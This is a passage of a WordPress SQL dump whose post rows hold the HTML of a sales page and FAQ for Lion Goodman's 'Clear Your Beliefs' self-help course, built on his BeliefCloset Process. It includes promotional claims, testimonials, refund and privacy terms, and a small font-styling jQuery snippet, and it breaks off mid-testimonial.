policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:54:37', '2014-06-19 06:54:37', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1050, 2, '2014-06-19 02:09:50', '2014-06-19 07:09:50', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It 